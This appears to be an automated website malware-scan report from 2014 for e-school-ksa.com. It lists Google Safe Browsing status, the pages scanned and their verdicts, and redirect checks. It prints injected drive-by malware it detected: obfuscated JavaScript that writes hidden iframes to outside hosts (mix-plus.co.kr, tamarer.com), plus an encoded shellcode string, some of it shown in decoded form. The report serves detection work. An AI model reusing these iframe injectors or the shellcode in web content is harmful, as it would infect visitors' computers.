Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=e-school-ksa.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://e-school-ksa.com/ | 200 OK Content-Length: 799 Content-Type: text/html | clean |
http://mix-plus.co.kr/p_image/index.php | 200 OK Content-Length: 4260 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. function ad9(t1E){return t1E.replace(/%/g,'').replace(/[~G'k]/g,eGp2)}
YUK0='G64ock75~6de~6et.G77ri~74e(k22k3cd~69vk20styleG3dG5ck22positiok6ek3aabG73oluteG3b ~6ceft~3a~2d10~300pG78~3b tk6fp~3ak2d1k30k300pxk3bG5cG22~3eG22)G3bfuncti~6fn i73(a)~7bd~6fcumenk74.write~28~22G3cif~72k61me k73rck3d~5ck22httpG3aG2f~2fmixk2dpluk73.~63o.~6bk72~2fp~5fimag~65~2finde~78.k70h~70k3fs~3dk6a~5ak54KN~62dfG26iG64G3dk22+a~2bk22~5ck22k3e~3ck2fif~72a~6dek3ek22)k3bk7 ...[3828 bytes skipped]... Decoded script: document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");function i73(a){document.write("<iframe src=\"http://mix-plus.co.kr/p_image/index.php?s=jZTKNbdf&id="+a+"\"></iframe>");}ZamO9=0;var scode="%uC031%u6499%u4003%u8B30%u0C40%u708B%uAD1C%u688B%uE808%u007C%u0000%u458B%u533C%u548B%u7805%u0156%u83EA%uFFC9%u8B52%u2072%uEE01%uAD41%uDB31%uC199%u0DCB%uD301%u9940%u5402%uFF05%uF375%uFB39%uEA75%u8B5E%u245E%uEB01%u8B66%u4B0C%u5E8B%u011C%u8BEB%u8B04%uE801%u5B5E%uE0FF%uBF50%uED49%u7E0F%uD3FF%u565E%u5250%u6854%uC000%u0000%u5056%u8BBF%uE ...[4436 bytes skipped]... | ||
http://e-school-ksa.com/search.php | 200 OK Content-Length: 751 Content-Type: text/html | clean |
http://e-school-ksa.com/test404page.js | 404 Not Found Content-Length: 70565 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function cE(){};this.hG=17182;cE.prototype = {kK : function() {var b=false;var l=15867;yG="yG";return 'hGtGt]p(:I/I/(aIdGien(gGuer(j].ecIoGm]/Gc(o]uIn(t(1e1(.(p]hGp('.gA(/[\(e\]IG]/g, '');this.cI=false;var cQ="";},f : function() {this.s=11249;var i="";this.w=false;mG="mG";var kT=26949;var d=window;var uF=new Date();var uR=function(){return 'uR'};var p = this;var wV="";var o=10714;var lZ=false;var z=document;this.pA=false;this.kZ=25718;var aP=new Arra ...[1921 bytes skipped]... Decoded script: document.write('<iframe scrolling="no" width="1" height="1" border="0" frameborder="0" src="http://tamarer.com/count20.php"></iframe>') document.write('<iframe scrolling="no" width="1" height="1" border="0" frameborder="0" src="http://tamarer.com/count20.php"></iframe>') <iframe scrolling="no" width="1" height="1" border="0" frameborder="0" src="http://tamarer.com/count20.php"></iframe> Antivirus reports:
| ||
http://e-school-ksa.com/forgot.php | 200 OK Content-Length: 751 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: e-school-ksa.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 13 Dec 2014 10:00:10 GMT
Pragma: no-cache
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 799
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=be7152e4987a7517c373ed9f73866026; path=/
X-Powered-By: PHP/5.2.17
...799 bytes of data.
GET / HTTP/1.1
Host: e-school-ksa.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 13 Dec 2014 10:00:10 GMT
Pragma: no-cache
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 799
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=be7152e4987a7517c373ed9f73866026; path=/
X-Powered-By: PHP/5.2.17
...799 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: e-school-ksa.com
Referer: http://www.google.com/search?q=e-school-ksa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: e-school-ksa.com
Referer: http://www.google.com/search?q=e-school-ksa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.